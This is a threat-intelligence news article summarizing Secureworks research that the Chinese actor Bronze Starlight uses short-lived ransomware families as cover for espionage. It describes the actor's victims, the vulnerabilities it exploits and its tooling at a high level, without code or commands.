A Chinese-based threat actor has been launching ransomware attacks against organizations in the U.S. and other countries, but evidence suggests that the ransomware is being used by the actor as a “smokescreen” to disguise the true espionage motives behind its campaigns.
The Bronze Starlight actor (also called DEV-0401 by Microsoft), active since early 2021, has been known to leverage a previously disclosed, custom DLL loader called HUI Loader in order to deploy Cobalt Strike and PlugX payloads for command and control as part of its attacks. Over the past year, the threat actor has relied on a lineup of five ransomware families - LockFile, AtomSilo, Rook, Night Sky and Pandora - and posted 21 victims to name-and-shame leak sites as of mid-April.
However, despite this ransomware activity, researchers believe that the threat actor’s end goal in these campaigns is stealing intellectual property as opposed to financial gain, and they estimated that 75 percent of the known victims would be of interest to Chinese government-sponsored groups focused on espionage based on the victims’ geographic locations and industry verticals. Over the past year, researchers have observed the group targeting pharmaceutical companies in Brazil and the U.S., electronic component designers and manufacturers in Lithuania and Japan, as well as a U.S. law firm and U.S.-based media organization with offices in China and Hong Kong.
“The victimology, short lifespan of each ransomware family, and access to malware used by government-sponsored threat groups suggest that Bronze Starlight’s main motivation may be intellectual property theft or cyberespionage rather than financial gain,” said Secureworks’ Counter Threat Unit Research Team in a Thursday analysis. “The ransomware could distract incident responders from identifying the threat actors’ true intent and reduce the likelihood of attributing the malicious activity to a government-sponsored Chinese threat group.”
Researchers believe the threat group uses the ransomware in these incidents to exfiltrate and encrypt data in order to destroy any forensic evidence of espionage activities. The use of ransomware can also district investigators from the true nature of the activity, as they would instead be focused on helping the business return to normal operations. In addition to the victimology, the operational cadence of these five ransomware families do not appear to align with conventional financially motivated cybercrime operations, said researchers.
“In each case, the ransomware targets a small number of victims over a relatively brief period of time before it ceases operations, apparently permanently,” they said.
“The ransomware could distract incident responders from identifying the threat actors’ true intent and reduce the likelihood of attributing the malicious activity to a government-sponsored Chinese threat group.”
Bronze Starlight compromises networks by targeting network perimeter devices with known vulnerabilities that have not yet been updated to apply patches. In October, for instance, researchers observed ransomware precursor activity overlapping with LockFile activity, where actors exploited the ProxyShell vulnerabilities in a Microsoft Exchange server to deploy a web shell. Activity overlapping with the group has also been spotted in attacks targeting the Log4Shell vulnerability (CVE-2021-44228) and the Atlassian Confluence Server and Data Center flaw (CVE-2022-26134).
Researchers said evidence points to Bronze Starlight developing the five ransomware families that it has used in attacks. LockFile and AtomSilo have a distinct code overlap, while Rook, Night Sky and Pandora appear to leverage the Babuk ransomware source code, which was reportedly leaked in September 2021 (a few months before the Rook operations started in December). The ransomware families do not appear to have been used by other threat groups, said researchers, and in addition to code overlaps in the ransomware strains themselves there are also significant similarities in the ransomware campaigns, including the use of HUI loader to load Cobalt Strike beacons, the Cobalt Strike beacon configuration information and the C2 infrastructure.
Researchers also noted a potential collaboration between the threat group and other Chinese-based actors. This is a characteristic that has been observed at a broader level by Chinese espionage attackers that have shared resources, information and in some cases malware. In a January incident response engagement, researchers observed that Bronze Starlight had compromised a server running ManageEngine ADSelfService Plus in order to deploy the HUI Loader and a Cobalt Strike beacon. Researchers observed another Chinese-based threat group, called Bronze University, active on the same network during this timeframe (mid-November to January), when it harvested credentials and prepared data for exfiltration. Meanwhile, Bronze Starlight suddenly suspended its activity in early December. While the reasons behind this are unclear, “the simultaneous and continued operations by another Chinese threat group on the same network suggests that the two groups may have deconflicted their post-intrusion activity,” said researchers.
“This scenario assumes collaboration and knowledge sharing between the groups,” said researchers. “It could indicate that Bronze Starlight participates in government-sponsored intelligence-gathering efforts rather than being a purely financially motivated threat group.”